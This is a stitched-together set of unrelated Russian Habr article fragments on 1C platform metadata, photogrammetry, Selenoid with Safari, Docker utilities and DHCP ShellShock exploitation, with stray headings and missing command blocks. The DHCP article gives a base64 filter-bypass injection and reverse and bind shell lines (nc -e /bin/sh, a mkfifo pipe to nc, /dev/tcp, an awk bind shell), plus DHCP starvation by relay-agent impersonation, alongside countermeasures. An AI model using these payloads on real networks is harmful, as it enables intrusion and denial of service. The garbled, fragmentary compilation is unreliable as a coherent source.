Держите его крепче

Разговаривайте

Ждите обратно

https://habrahabr.ru/post/334056/

• Справочники
• Документы
• Регистры накопления

• существует несколько стандартных реквизитов (полей), заложенных сразу в платформу (ссылка-идентификатор, код, наименование, ссылка на родителя для иерархического справочника, …)
• можно описать свои (произвольные) реквизиты (поля)
• можно описать табличные части, которые представляют собой тесно связанные сущности (containment) или еще их можно считать вложенными таблицами

• Прежде всего, конечно, это создание структур данных для хранения и автоматическое преобразование структуры при изменении модели
• Набор классов в объектной модели для манипулирования данными (чтения, записи, поиска)
• Механизм объектно-реляционного преобразования
• Набор типичных процедур обработки данных. Например, для документов это автоматическая нумерация, для регистра это расчет итогов, получение среза остатков на конкретный момент времени, и т.д.
• Отражение в системе прав. Так как система знает о назначении объекта, то знает и какие права для него будут актуальны
• Визуализация (отражение в интерфейсе). Опять же, зная о назначении и роли объектов, система сама конструирует и команды в интерфейсе приложения для доступа к объектам этого типа, и формы для просмотра и редактирования, и команды для различных действий с объектом.
• Обмен данными. На основании знания семантики данных платформа предоставляет стандартный механизм для асинхронного обмена измененными данными как среди родственных приложений (узлов распределенной базы), так и между разнородными приложениями (написанными как на 1С:Предприятии, так и на других технологиях)
• Объектные и транзакционные блокировки. Для правильного построения системы блокировки нужно знание о назначении данных и о взаимосвязях.
• Механизм характеристик (дополнительных полей, определяемых пользователем)
• Автоматически предоставляемый REST интерфейс (по стандарту OData)
• Выгрузку-загрузку данных в XML, JSON
• Кроме того, автоматически работают такие механизмы как: полнотекстовый поиск, журналирование доступа к данным, и т.д.

https://habrahabr.ru/post/334050/

1. В результате атаки;
2. Выброшены деньги на средства защиты, которые не используются даже на 50%.

Используете ли вы Pentest для проверки защищенности своей сети?

	Да, самостоятельно
	Да, с помощью компаний предоставляющих услуги Pentest-а
	Нет, но хотелось бы
	Нет и не планирую

Проголосовал 1 человек. Воздержавшихся нет.

Только зарегистрированные пользователи могут участвовать в опросе. Войдите, пожалуйста.

Original source: habrahabr.ru (comments, light).

https://habrahabr.ru/post/334052/

Введение

Фотограмметрия

Техника

1. Ручная выдержка: хотя технически можно использовать и плохую камеру с автоматическими настройками, на самом деле отсутствие ручной выдержки очень ограничивает. Нужно, чтобы все снимки имели одинаковые настройки, иначе камера начнёт компенсировать более тёмные снимки и программному обеспечению будет гораздо сложнее привязать снимки друг к другу, а вам — удалить информацию об освещении. Почти во всех камерах и телефонах сегодня есть функция ручной выдержки.
2. Хорошая SD-карта/высокая скорость записи: сначала это не так очевидно, но это может изменить ваш мир. Долгое время я пользовался медленной SD-картой и мне приходилось ждать примерно по 5 секунд между снимками (как только заполнялась буферная память карты). Когда делаешь сотни кадров, 5 секунд между снимками — это много.
3. Файлы в формате RAW: это самая главная причина, по которой я рекомендую DSLR. Формат файлов RAW содержит гораздо больше информации и динамического диапазона, чем обычный JPG (который, к тому же имеет артефакты сжатия). Он позволяет предварительно обрабатывать снимки, добиваясь, среди прочего, лучшего качества, цветового баланса и устранения виньеток.
   
   Кроме того, он позволяет уменьшать информацию об освещении перед обработкой сканов, что упрощает удаление этой информации после процесса. Файлы RAW могут быть огромными, так что стоит учесть это при выборе SD-карты.

1. Штатив: совершенно верно, я редко использую штатив, по крайней мере, при съёмках на улице. Это мой личный выбор. Для меня приоритетнее большая скорость затвора, чем большая диафрагма (подробнее об этом позже). Не поймите меня неправильно, использование штатива вне всяких сомнений улучшает качество сканов, но тут есть недостаток — на установку штатива для каждого снимка тратится время, много времени (а ведь даже несколько секунд на кадр в сумме дают очень очень много). При съёмке на улице условия освещения редко бывают идеальными, поэтому я обычно стремлюсь быть как можно быстрее (но без суеты), чтобы избежать постепенной смены условий освещения при сканировании. Повторюсь, если вы сканируете в помещении или условия освещения стабильные, то нет никаких причин не использовать штатив! Более того, возможно, для вас хорошим компромиссом между потраченным временем и качеством может быть монопод.
   
2. Калибровщик цветов (color checker): нет ни одной достойной причины не использовать их, кроме дороговизны — примерно 100 долларов за X-Rite Passport. Калибровщик цветов обеспечивает правильную калибровку цветов. Скоро я его себе куплю.
   
   
   
3. Хромированные шары и всё оборудование для удаления информации об освещении HDR: по-моему, это просто трата времени и денег, по крайней мере, для текстур, но может быть и пригодится для больших сканов на 360 градусов. По умолчанию, если вы сканируете текстуры, то снимаемая поверхность чаще всего смотрит в одном направлении и освещение всего скана практически одинаково. Можно избавиться от остатков освещения за несколько минут работы в Photoshop и не тратить время на возню с удалением информации об освещении HDRI.

Освещение

1. Дождя: при сканировании должно быть сухо. В зависимости от материала дождь может сделать его более отражающим или тёмным.
   
2. Изменения условий: если вам не удаётся застать хорошего равномерного облачного неба, по крайней мере стремитесь к чему-то стабильному, даже если солнечно, в таком случае можно будет отсканировать что-нибудь в тени. Надо любой ценой избегать движущихся облаков, потому что они могут буквально за секунды значительно изменять освещённость.

Сколько снимков обычно нужно делать, чтобы получить хороший материал?

Программное обеспечение

Особенности

Удаление информации об освещении

Карты нормалей

1. Любой ценой избегайте нависания: об этом нужно помнить даже во время съёмки, разберитесь, какая область может выглядеть неправильно при смещении на плоскости, и знайте, как исправить это, если всё равно решите снимать. Как я объяснил в своём туториале, большинство проблем можно решить созданием специальной низкополигональной модели. Однако это хитрая проблема, потому что вы можете не заметить её, пока уже не заберётесь в процессе очень далеко. На моих первых сканах было много растяжений из-за нависаний.
   
2. 
   Пример растяжения из-за нависаний в одном из моих первых сканов. Специальная низкополигональная сетка, которую я теперь использую, исправило бы это.
   
   Не ожидайте, что скан будет достаточно детальным для сверхчёткой карты нормалей. Потребуется регенерировать высокочастотные детали, преобразовав albedo в карту нормалей и наложив мелкие детали поверх нормалей скана.
   

Почему вы думаете, что использование карт отражений важно для подбора правильных типов материалов?

https://habrahabr.ru/post/333950/

Привет! Это моя новая статья, посвященная Selenium. Ранее я уже подробно рассказал об организации масштабируемого кластера Selenium (часть I, часть II). Затем мы рассмотрели вопрос использования Selenium в качестве инструмента отладки автотестов (раз, два), Наконец, нам удалось создать порядок из хаоса на Windows (ссылка). Сегодня мы будем иметь дело с яблоками, точнее с одним большим Яблоком (т.е. с Apple).

Хотя Selenium является относительно простым инструментом, жизнь усложняется, когда мы пытаемся запускать автоматические тесты в браузерах из Купертино: Safari под MacOS и мобильный Safari под iOS. Чтобы полностью разобраться с браузерами для настольных операционных систем, давайте сегодня поговорим о Safari под MacOS. Сегодня свежие версии Safari разрабатываются только под MacOS. Исторически работа с Safari была реализована в Selenium при помощи браузерного расширения, которое транслировало команды Selenium во внутренние команды браузера. Изначально расширение загружалось в Safari автоматически. Позже из-за изменения правил безопасности в Safari нужно было установить расширение один раз вручную. Наконец, с выходом Safari X все значительно поменялось. Теперь Safari использует отдельно стоящий процесс веб-драйвера — safaridriver, аналогично chromedriver у Chrome и geckodriver у Firefox. Чтобы запустить тесты в Safari нужно:

1. Запустить safaridriver (обычно устанавливаемый вместе с Safari и расположенный в /usr/bin/safaridriver) на свободном порту, например, 4444. Команда для запуска будет такая:

$ /usr/bin/safaridriver --port 4444

1. Запустить тесты, используя следующий Selenium URL:

http://localhost:4444/

1. Остановить запущенный процесс драйвера.

Звучит легко, не правда ли? И так оно и есть! Тем не менее есть проблема — safaridriver умеет работать только с одной копией Safari параллельно. Как преодолеть это ограничение? — Запустить драйвер несколько раз на разных портах и запустить тесты на разных URL с этими портами. Просто, но требует много ручной работы. Давайте автоматизируем этот процесс! Как это могло бы работать? А вот как:

1. Вы запускаете сервер, предоставляющий Selenium API и указываете ему при старте, где расположен safaridriver.
2. Когда приходит запрос на новую сессию — запущенный сервер ищет свободный порт и занимает его. Затем он запускает процесс safaridriver на этом порту и проксирует все последующие запросы туда же.
3. Когда поступает запрос на закрытие сессии — процесс safaridriver также останавливается.

Описанный алгоритм очень прост, поэтому он не должен требовать разработки сложного сервера, не так ли? Если вы возьмете в качестве сервера сегодняший стандарт — Selenium сервер, то будете использовать чересчур сложный инструмент для такой просто задачи. Почему это так:

1. Selenium server — огромный как слон! Размер дистрибутива начинается от 20 Мб.
2. Он требует установки Java — еще одного гигантского существа в ваш зоопарк. Со всякими всплывающими окнами об обновлении и графическим интерфейсом из 90-х.
3. Он всегда голоден и есть память без причины.
4. Он довольно плохо документирован и не работает из коробки. Нужно быть волшебником, чтобы заставить его заработать.

Короче говоря, позвольте мне показать вам более подходящий инструмент — Selenoid. Selenoid — это легковесный демон, созданный полностью заменить тучный Selenium сервер. Завести Selenoid с Safari очень просто:

1. Скопировать кусочек JSON, приведенный ниже, в файл (например, в ~/browsers.json):

{
    "safari": {
        "default": "latest",
        "versions": {
            "latest": {
                    "image": ["/usr/bin/safaridriver"]
            }
        }
    }
}

1. Запустить и скачать исполняемый файл Selenoid:

$ curl -Lo ~/selenoid \
     https://github.com/aerokube/selenoid/releases/download/1.3.3/selenoid_darwin_amd64
$ chmod +x ~/selenoid
$ ~/selenoid -conf ~/browsers.json -disable-docker

1. Запустить тесты, используя URL:

http://localhost:4444/wd/hub

Больше не нужно устанавливать Java и компанию! Но если вы, как я, не хотите делать руками и это, то можете получить аналогичный результат, используя однострочный скрипт:

$ curl -Lo ~/cm https://github.com/aerokube/cm/releases/download/1.2.1/cm_darwin_amd64 && \
    chmod +x ~/cm && \
    ~/cm selenoid start --browsers safari

При желании вы также можете скачать и запустить легковесный UI для Selenoid. Подробнее об этом можно почитать в документации.

Простое Selenium тестирование в Safari никогда не было так близко. Хорошего дня!

https://habrahabr.ru/post/334048/

В данной статье мы расскажем, как эксплуатировать ShellShock на клиенте DHCP и получить на нем полноценный reverse или bind shell. Интернет пестрит статьями, повествующими о возможностях эксплуатации shellshock на DHCP-клиентах. Есть даже статьи о том, как получить reverse shell на DHCP-клиенте. Однако, стабильно и повсеместно работающего инструмента для получения shell мы еще не встречали. Те, кто в теме, возможно, нового здесь не увидят, но не исключено, что вам будет интересно узнать, как нам удалось автоматизировать получение reverse и bind shell в условиях фильтрации и экранирования символов на стороне DHCP-клиента. Кроме того, мы расскажем и о том, чем вообще может быть интересен протокол DHCP.

Протокол DHCP применяется для автоматического назначения IP-адреса, шлюза по умолчанию, DNS-сервера и т.д. В качестве транспорта данный протокол использует UDP, а это значит, что мы можем без особых проблем подменять все интересующие нас поля в сетевом пакете, начиная с канального уровня: MAC-адрес источника, IP-адрес источника, порты источника — то есть все, что нам хочется.

Работает DHCP, в двух словах, примерно так:

1. DHCPDISCOVER Клиент отправляет широковещательный сетевой пакет с целью найти DHCP-сервер в сети, при этом с канальным уровнем все понятно и о нем писать дальше не будем, сетевой — исходя из собственного опыта, здесь может быть всякое — зависит от клиента, но должно быть:
   SRC IP: 0.0.0.0, DST IP: 255.255.255.255.
   На транспортном уровне все запросы отправляются так:
   SRC PORT: 68, DST PORT: 67
   Соответственно, когда сервер отвечает клиенту:
   SRC PORT: 67, DST PORT: 68
   Контрольную сумму UDP можно не считать. Мы не встречали ни одного DHCP-сервера, который бы ее проверял, да и сетевое оборудование пропускает пакеты с нулевым значением UDP checksum без проблем. В первом байте прикладного уровня (поле op — тип сообщения) клиент выставляет значение — 0х01 (BOOTREQUEST — запрос от клиента к серверу). На остальных полях пакета не будем останавливаться, поскольку их описание, длина и значения есть в RFC и в WIKI. В запросе от клиента нам также интересно поле xid (Transaction ID — рандомное число размером 4 байта по смещению 0х04 от начала прикладного уровня в пакете). Если сервер в ответе выставит поле xid не равным xid клиента, то клиент отбросит ответ от сервера, поскольку посчитает, что этот ответ в другой транзакции. Остановимся на DHCP-опциях пакета. Всего их 256, а полный список можно найти здесь или тут. Клиент обязательно выставляет опцию с кодом 53 (DHCP message type тип DHCP сообщения) равной 0х01, это значит, что данный пакет предназначен для нахождения DHCP-сервера, и опцию 55 (Parameter Request List список запрашиваемых у сервера параметров, например адрес шлюза, маска подсети, DNS-серверы и т.д.).
   Вот так выглядит этот запрос в WireShark:
   

   
   

2. DHCPOFFER Сервер получает запрос от клиента и отправляет ему предложение. На сетевом уровне в качестве SRC IP сервер выставляет свой IP-адрес, в DST IP должно быть: 255.255.255.255, но это не всегда так. В DST IP также может быть выставлен IP-адрес, выделенный клиенту, или IP-адрес ретранслятора, если тот участвует в процессе. Вы спросите, а как же пакет доходит до клиента, если у него еще нет IP-адреса? Все просто: в DHCPDISCOVER- и DHCPREQUEST-запросах, в поле chaddr (Сlient MAC address) клиент указывает свой MAC-адрес. Таким образом, сервер или ретранслятор знают, куда доставлять пакет на канальном уровне, поскольку сервер или ретранслятор всегда находятся в пределах одного широковещательного домена с клиентом, а что происходит на сетевом уровне, не так уж и важно UDP магия. В типе сообщения значение 0х02 (BOOTREPLY — ответ сервера клиенту). В поле xid выставляется значение, равное значению поля xid в запросе клиента. В поле yiaddr (Your (client) IP address) выставляется IP-адрес клиента, предложенный сервером. Что появляется в DHCP-опциях: в опции с кодом 53 (DHCP message type) значение — 0х02 (DHCPOFFER), код 51 (IP Address Lease Time) — время аренды IP-адреса, код 54 (Server Identifier) — IP-адрес DHCP-сервера. Все остальные опции предложения зависят от того, какие параметры запросил клиент, их список клиент указал в DHCPDISCOVER-запросе в опции с кодом 55 (Parameter Request List).
   

   
   

3. DHCPREQUEST Клиент отправляет серверу запрос на получение сетевых параметров. На сетевом уровне должно быть так: SRC IP: 0.0.0.0 DST IP: 255.255.255.255 но может быть и так: в SRC IP выставляется IP-адрес, который назначил сервер в своем предложении (поле yiaddr), а в DST IP выставляется IP-адрес, который расположен в опции предложения сервера с кодом 54 (Server Identifier). DHCP-опции в этом запросе не отличаются от DHCPDISCOVER-запроса, за исключением опции с кодом 53 (DHCP message type тип DHCP сообщения), равной 0х03 — это значит, что данный пакет предназначен для запроса параметров от DHCP-сервера. И еще клиент добавляет в запрос опцию с кодом 54 (Server Identifier), поскольку уже знает IP-адрес сервера, а также опцию с кодом 50 (Requested IP address). Кроме того, клиент может выставить опцию 12(Host Name Option свое имя хоста) и т.п.
   

   
   
4. DHCPACK Сервер отправляет клиенту подтверждение. На сетевом уровне должно быть так: SRC IP: DST IP: 255.255.255.255. Опции и поля этого пакета не отличаются от DHCPOFFER, за исключением опции с кодом 53 (DHCP message type тип DHCP-сообщения), равной 0х05 — это значит, что данный пакет — подтверждение от DHCP-сервера.
   

Далее, клиент с помощью протокола ARP пытается обнаружить конфликт IP-адресов в локальной сети (Address Conflict Detection). Если конфликт не найден, клиент выставляет полученные из DHCPACK параметры сетевому интерфейсу. Если обнаружен, клиент рассылает широковещательное сообщение отказа DHCP DHCPDECLINE, после чего процедура получения IP-адреса повторяется.

Также у протокола DHCP есть еще одна особенность: если клиент ранее отправлял запрос DHCPDISCOVER, то при повторном подключении к той же сети клиент сразу отправляет DHCPREQUEST; при этом в DHCP-опции с кодом 50 (Requested IP address) выставляется IP-адрес, полученый ранее.

Остановимся на упомянутом DHCPDECLINE подробнее. На практике это выглядит так:

1. Клиент отправляет DHCPREQUEST, поскольку уже подключался к этой сети. Transaction ID: 0x825b824a; Requested IP: 192.168.1.171; Client MAC address: 08:00:27:ce:7a:64
   

   
   

2. Сервер отвечает DHCPACK.
   Transaction ID: 0x825b824a; yiaddr: 192.168.1.171; siaddr: 192.168.1.1; router: 192.168.1.1
   

   
   

3. Клиент с помощью протокола ARP узнает MAC-адрес шлюза, а далее, через тот же ARP, пытается обнаружить конфликт IP-адресов в локальной сети (Address Conflict Detection). Запрос выглядит так:
   sender mac: 08:00:27:ce:7a:64; sender ip: 0.0.0.0; target mac: 00:00:00:00:00:00; target ip: 192.168.1.171
   

   
   

4. Хост с IP-адресом 192.168.1.171 отвечает на ARP-запрос.
   

   
   

5. Клиент выявил конфликт IP-адресов в сети и отправляет широковещательный DHCPDECLINE.
   Transaction ID: 0x825b824a; Requested IP: 192.168.1.171; ciaddr: 192.168.1.171
   

   
   
6. Процедура получения IP-адреса повторяется, но уже с другим Transaction ID: 0x713a0fe7. Вы обратили внимание на пакеты с номерами 89, 101, 106, 136 и 151? Если да, то наверняка поняли, что на этот раз сервер выделил клиенту IP-адрес 192.168.1.172 и перед этим DHCP-сервер сам с помощью того же ARP (пакеты с номерами 89, 101, 106: Who has 192.168.1.172? Tell 192.168.1.1) убедился, что IP-адрес 192.168.1.172 свободен, и только потом отправил DHCPOFFER. После этого клиент еще раз попытался выявить конфликт IP-адресов (пакеты с номерами 136, 151: Who has 192.168.1.172? Tell 0.0.0.0).
   

Мы уже знаем, что клиент, подключившись хотя бы раз к сети, будет отправлять только DHCPREQUEST-запрос, выставляя при этом в Requested IP адрес, который получил ранее. Но что если DHCP-сервер уже выделил этот IP-адрес, поменялась конфигурация или адресация, и сервер не может дать клиенту этот адрес? Для этого существует тип сообщения DHCPNAK. Работает он следующим образом:

1. Клиент отправляет DHCPREQUEST.
   Transaction ID: 0xa7ddc5cb; Requested IP: 192.168.1.14
   

   
   

2. В настройках сервера указан диапазон, в котором он может выделять IP-адрес, но тот, который запросил клиент, не входит в данный диапазон, поэтому сервер отправляет DHCPNAK.
   Transaction ID: 0xa7ddc5cb; Message: address not available
   

   
   
3. Процедура получения IP-адреса повторяется, но уже с другим Transaction ID: 0xcfbf77a9.
   

Перейдем к shellshock

Про то, как и почему работает shellshock, писать нет никакого смысла, ведь эта уязвимость — одна из самых популярных, и о ней есть великое множество статей. Лучше остановимся на моменте, как получить shell на клиенте DHCP, в случае, если мы выступим в роли DHCP-сервера.

В какие поля и опции можно инъектировать?

Ответ: практически в любые! Вот список кодов DHCP-опций, в которые возможно инъектировать (проверено на NetworkManager из состава CentOS 6.5): 14, 18, 43, 56, 60, 61, 62, 63, 64, 66, 67, 77, 80, 82, 83, 84, 86, 87, 90, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 115, 116, 117, 120, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 250, 251, 253.

В нашем PoC мы будем использовать DHCP-опцию с кодом 114 (URL). Почему? Потому, что ее длина — вариативна (максимальная длина — 256 байт), а также потому, что ее все используют. Ее описание еще есть здесь. Существует даже статья о том, как с помощью этой опции обновить уязвимые к shellshock системы :)

Какие у нас ограничения?

Ответ: их много, слишком много!

1. Длина — 256 байт
2. Возможно использовать только команды интерпретатора
3. Большое ограничение на используемые символы: некоторые фильтруются, некоторые экранируются. Это зависит от клиента DHCP. Вот набор символов, которые не везде получится использовать: "';&|
4. После выполнения команды, IPv4-адрес может не присвоиться, в таком случае возможно использовать IPv6 link-local-адрес, если на интерфейсе не включено игнорирование IPv6
5. Необходимо использовать абсолютные пути, иначе команда может не выполниться

И что тогда делать?

Ответ: обходить ограничения!
Для обхода фильтра мы должны выполнить все одной командой. Сделаем это так:

/bin/sh <(/usr/bin/base64 -d <<< Base64String)

Здесь на вход интерпретатора /bin/sh мы подаем вывод /usr/bin/base64, которая декодирует строку Base64String. Таким образом, мы использовали уже 34 байта, длина Base64String не должна превышать 222 байтов.

А что будет в Base64String? Не забываем про четвертое ограничение, поэтому в первую очередь выставим IP-адрес интерфейсу командой:

/bin/ip addr add / dev eth0;

Эта команда накладывает на нас еще одно ограничение: мы должны знать имя интерфейса, которому выставляем IP-адрес. По умолчанию, в старых версиях Linux, на которых еще есть shellshock, первый сетевой интерфейс называется eth0, так что ориентируемся на него. Еще в эту строку мы должны поместить reverse shell или bind shell.

Для reverse shell будем использовать стандартный shell с использованием nc:

nc -e /bin/sh   2>&1 &
rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc   >/tmp/f &

Для reverse shell также можно использовать команду отсюда:

/bin/bash -i >& /dev/tcp// 0>&1

Для bind shell будем использовать /cmd/unix/bind_awk из состава Metasploit, как один из наиболее коротких:

awk 'BEGIN{s="/inet/tcp//0/0";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' &

PoC

Видео:

1. CentOS 6.5

   
   

2. Debian 7.5.0

   
   
3. Ubuntu 14.04

Еще немного про DHCP

Ни в коем случае DHCP нельзя рассматривать исключительно как метод получения RCE на клиентах, потому что, во-первых, мы должны ответить быстрее реального DHCP-сервера в сети, и, во-вторых, на клиенте должен быть shellshock, а это маловероятно. Протокол DHCP в первую очередь необходимо рассматривать как метод осуществления MITM.

Поговорим о том, как ответить на любой запрос быстрее DHCP-сервера. Самый очевидный вариант — быть ближе к клиенту по расположению в сети, и еще наше железо и алгоритм должны работать быстрее. Однако, в большинстве случаев это не так.

Есть второй вариант: нужно нагрузить сервер, но при этом не занимать новые IP-адреса в сети, чтобы не исчерпать весь пул свободных адресов (такая атака называется DHCP starvation). Как вы уже поняли, необходимо отправлять большое количество запросов DHCPDISCOVER, поскольку сервер должен обработать каждый из них и отправить в ответ DHCPOFFER. Однако, в рамках данной транзакции DHCPREQUEST мы отправлять не будем, поэтому сервер будет его ждать. IP-адрес не будет считаться выделенным, потому что процедура получения IP не завершена.

Давайте посмотрим, как это выглядит на практике.

Графы нагрузки и процессы до отправки DHCPDISCOVER-запросов:

На рисунках видно, что load average роутера колеблется от 0.1 до 0.3, и процесс dnsmasq занимает 0% CPU.

Графы нагрузки, процессы и список DHCP-клиентов во время отправки DHCPDISCOVER-запросов:

Load average роутера повысился до 1.96, и он уже не успевает отвечать на все запросы DHCPDISCOVER, процесс dnsmasq занимает целых 64% CPU, но при этом в списке DHCP клиентов только наш хост.

В результате, мы и сервер немного нагрузили, и IP-адреса не заняли. Если мы отфильтруем все сгенерированные нами же запросы DHCPDISCOVER, вероятнось того, что мы ответим быстрее реального DHCP-сервера, значительно увеличится. Задача выполнена, идем дальше.

Теперь поговорим о типах DHCP сообщений:

Первые шесть типов сообщений мы уже разобрали, осталось всего два: седьмой (DHCPRELEASE) и восьмой (DHCPINFORM). Остановимся на них подробнее.

Клиент может явным образом прекратить аренду IP-адреса. Для этого он отправляет сообщение освобождения аренды адреса DHCPRELEASE тому серверу, который предоставил адрес ранее. В отличие от других сообщений, это не рассылается широковещательно.

Сообщение информации DHCPINFORM предназначено для определения дополнительных сетевых параметров теми клиентами, у которых IP-адрес настроен вручную. Исходя из своего опыта, можем сказать, что такие сообщения отправляют только Windows хосты :(. Сервер отвечает на подобный запрос DHCPACK без выделения IP-адреса. Для этих сообщений существует свой проект rfc. Вы уже поняли, что мы можем выставить в DHCPACK свой шлюз, DNS, и т.д. Главное — ответить раньше реального DHCP сервера, а эта проблема уже решена выше.

DHCP starvation & DHCP relay agent

В данной статье мы упоминали про атаку DHCP starvation — исчерпание пула свободных IP-адресов. Бытует мнение, что провести данную атаку возможно, отправляя лишь большое количество DHCPDISCOVER или DHCPREQUEST запросов с рандомных MAC-адресов, и тогда на каждый такой запрос DHCP-сервер выделит и зарезервирует IP-адрес, но это не всегда так. Как мы уже знаем, процедура получения и резервирования IP-адреса заканчивается тогда, когда DHCP-сервер отправляет сообщение DHCPACK. Наиболее корректно производить данную атаку, представляясь как DHCP relay agent.

Приведем пример:

1. Наш сетевой интерфейс enp0s3 с MAC-адресом: 08:00:27:6a:82:5f и IP-адресом: 192.168.1.2. В качестве DHCP-сервера будет выступать Dnsmasq/2.73 из состава OpenWrt Chaos Calmer 15.05.1 IP-адрес: 192.168.1.1
   
   

   
   
2. Начинаем отправку запросов:
   
   

Таким образом, мы забъем весь пул свободных IP-адресов, а легитимный DHCP-клиент сможет получить IP-адрес от этого DHCP-сервера только через 12 часов. Пока легитимный DHCP-сервер не может отправить ответы клиентам, это можем сделать мы!

Как это работает:

1. Формируем и отправляем широковещательный DHCPDISCOVER-запрос, при этом представлемся как DHCP relay agent. В поле giaddr (Relay agent IP) указываем свой IP-адрес 192.168.1.2, в поле chaddr (Client MAC address) — рандомный MAC 00:19:bb:f5:e7:a8, при этом на канальном уровне в SRC MAC выставляем свой MAC-адрес.
   

   
   

2. Сервер отвечает сообщением DHCPOFFER агенту ретрансляции (нам), и предлагает клиенту с MAC-адресом 00:19:bb:f5:e7:a8 IP-адрес 192.168.1.232
   

   
   

3. После получения DHCPOFFER, отправляем широковещательный DHCPREQUEST-запрос, при этом в DHCP-опции с кодом 50 (Requested IP address) выставляем предложеный клиенту IP-адрес 192.168.1.232, в опции с кодом 12 (Host Name Option) — рандомную строку. Важно: значения полей xid (Transaction ID) и chaddr (Client MAC address) в DHCPREQUEST и DHCPDISCOVER должны быть одинаковыми, иначе сервер отбросит запрос, ведь это будет выглядеть, как другая транзакция от того же клиента, либо другой клиент с той же транзакцией.
   

   
   
4. Сервер отправляет агенту ретрансляции сообщение DHCPACK. С этого момента IP-адрес 192.168.1.232 считается зарезервированным за клиентом с MAC-адресом 00:19:bb:f5:e7:a8 на 12 часов (время аренды по умолчанию).
   

Выводы

Способы противодействия:

1. DHCP snooping — функция коммутатора, предназначенная для защиты от атак с использованием протокола DHCP. Например, атаки с подменой DHCP-сервера в сети;

   
   

2. Port security — функция коммутатора, позволяющая указать MAC-адреса хостов, которым разрешено передавать данные через порт. После этого порт не передает пакеты, если MAC-адрес отправителя не указан как разрешенный;

   
   

3. Настройка сетевого оборудования с целью ограничения количества DHCPDISCOVER и DHCPREQUEST запросов с одного MAC-адреса и/или IP-адреса;

   
   

4. Запись и анализ трафика в сети для отслеживания аномалий. Например, обычное количество DHCP-запросов в вашей сети не превышает 100-200 в день, а во время атаки DHCP starvation их число увеличивается многократно. Еще один пример: обычно в вашей сети количество DHCP-ответов не превышает количества DHCP-запросов, а теперь количество DHCP-ответов стало вдвое больше DHCP-запросов. Это значит, что кто-то производит атаку с подменой DHCP-сервера;

   
   

5. Использование IDS, IPS, SIEM и систем мониторинга оборудования типа Zabbix;

   
   
6. Непрерывное обновления программного обеспечения. Обновить хосты можно и так :)

https://habrahabr.ru/post/333978/

Источник изображения

На просторах сети Интернет можно найти немало полезных утилит для Docker. Многие из них принадлежат к разряду Open Source и доступны на Github. В последние два года я достаточно активно использую Docker в большинстве своих проектов по разработке программного обеспечения. Однажды начав работать с Docker, вы осознаете, что он оказывается полезен для гораздо более широкого круга задач, нежели вы изначально предполагали. Вам захочется сделать с Docker еще больше, и он не разочарует!

Docker-сообщество живет активной жизнью, ежедневно производя новые полезные инструменты. За этой бурной деятельностью достаточно сложно уследить. Поэтому я решил выбрать несколько наиболее интересных и полезных из ежедневно используемых мной Docker-утилит. Они делают работу более продуктивной, автоматизируя операции, которые пришлось бы выполнять вручную.

Давайте посмотрим на утилиты, которые помогают мне в процессе докеризации всего и вся.

1. Watchtower — автоматическое обновление Docker-контейнеров

Watchtower мониторит выполняющиеся контейнеры и отслеживает изменения в образах, на основе которых они были созданы. Если образ изменился, Watchtower автоматически перезапускает контейнер, используя новый образ. Это удобно при локальной разработке, если есть желание работать с самыми новыми версиями используемых инструментов.

Утилита Watchtower также поставляется в виде Docker-образа и выполняется в контейнере. Для ее запуска введите следующую команду:

Мы запустили Watchtower с примонтированным файлом /var/run/docker.sock. Это нужно для того, чтобы Watchtower мог взаимодействовать с демоном Docker через соответствующий API. Мы также передали опцию interval, равную 30 секундам, которая определяет интервал опроса. У Watchtower есть и другие опции, которые описаны в документации.

Давайте запустим контейнер и помониторим его с помощью Watchtower.

Теперь Watchtower начнет мониторинг контейнера friendlyhello. Если я размещу новый образ на Docker Hub, Watchtower во время очередного запуска это обнаружит. Затем она корректно остановит контейнер и перезапустит его из нового образа. Также контейнеру будут переданы указанные нами в команде run опции, то есть он будет запущен с -p 4000:80.

По умолчанию Watchtower будет искать новые версии образов в реестре Docker Hub. При этом Watchtower может опрашивать закрытые реестры, используя для входа учетные данные из переменных окружения REPO_USER и REPO_PASS.

Более подробную информацию о Watchtower вы можете найти в документации.

2. Docker-gc — удаление ненужных контейнеров и образов

Утилита docker-gc помогает очистить Docker-хост, удалив более не нужные образы и контейнеры. Удаляются контейнеры, завершенные более часа назад, а также образы, не принадлежащие ни одному из оставшихся контейнеров.

Docker-gc может запускаться в виде скрипта или контейнера. Мы воспользуемся вторым вариантом. Запустим docker-gc, чтобы узнать, какие контейнеры и образы можно удалить.

Чтобы docker-gc мог взаимодействовать с Docker через его API, мы подмонтировали сокет-файл Docker. Для поиска контейнеров и образов, которые можно удалить, запустим docker-gc с переменной окружения DRY_RUN=1. При этом никаких изменений на диске сделано не будет. Всегда лучше сначала убедиться, что docker-gc не собирается удалить ничего лишнего. Вот вывод этой команды:

Если вы согласны с предложенным docker-gc планом очистки, запустите ту же команду, но теперь уже без DRY_RUN.

В выводе будут перечислены удаленные docker-gc контейнеры и образы.

У docker-gc есть еще несколько опций. Чтобы получить более подробную информацию об этой утилите, рекомендую почитать соответствующую документацию.

3. Docker-slim — волшебная пилюля, которая поможет вашим контейнерам похудеть

Обеспокоены размером ваших Docker-образов? Вам поможет docker-slim!

Эта утилита использует статический и динамический анализ для создания легковесных вариантов Docker-образов. Чтобы поработать с docker-slim, загрузите бинарник с Github (доступны версии для Linux и Mac), а затем добавьте путь к исполняемому файлу в переменную окружения PATH.

С помощью инструкции из официальной документации Docker я создал образ для демонстрационного приложения friendlyhello. Размер образа составил 194 МБ.

Для очень простого приложения нам пришлось загрузить 194 МБ! Посмотрим, сколько мегабайт можно скинуть с docker-slim.

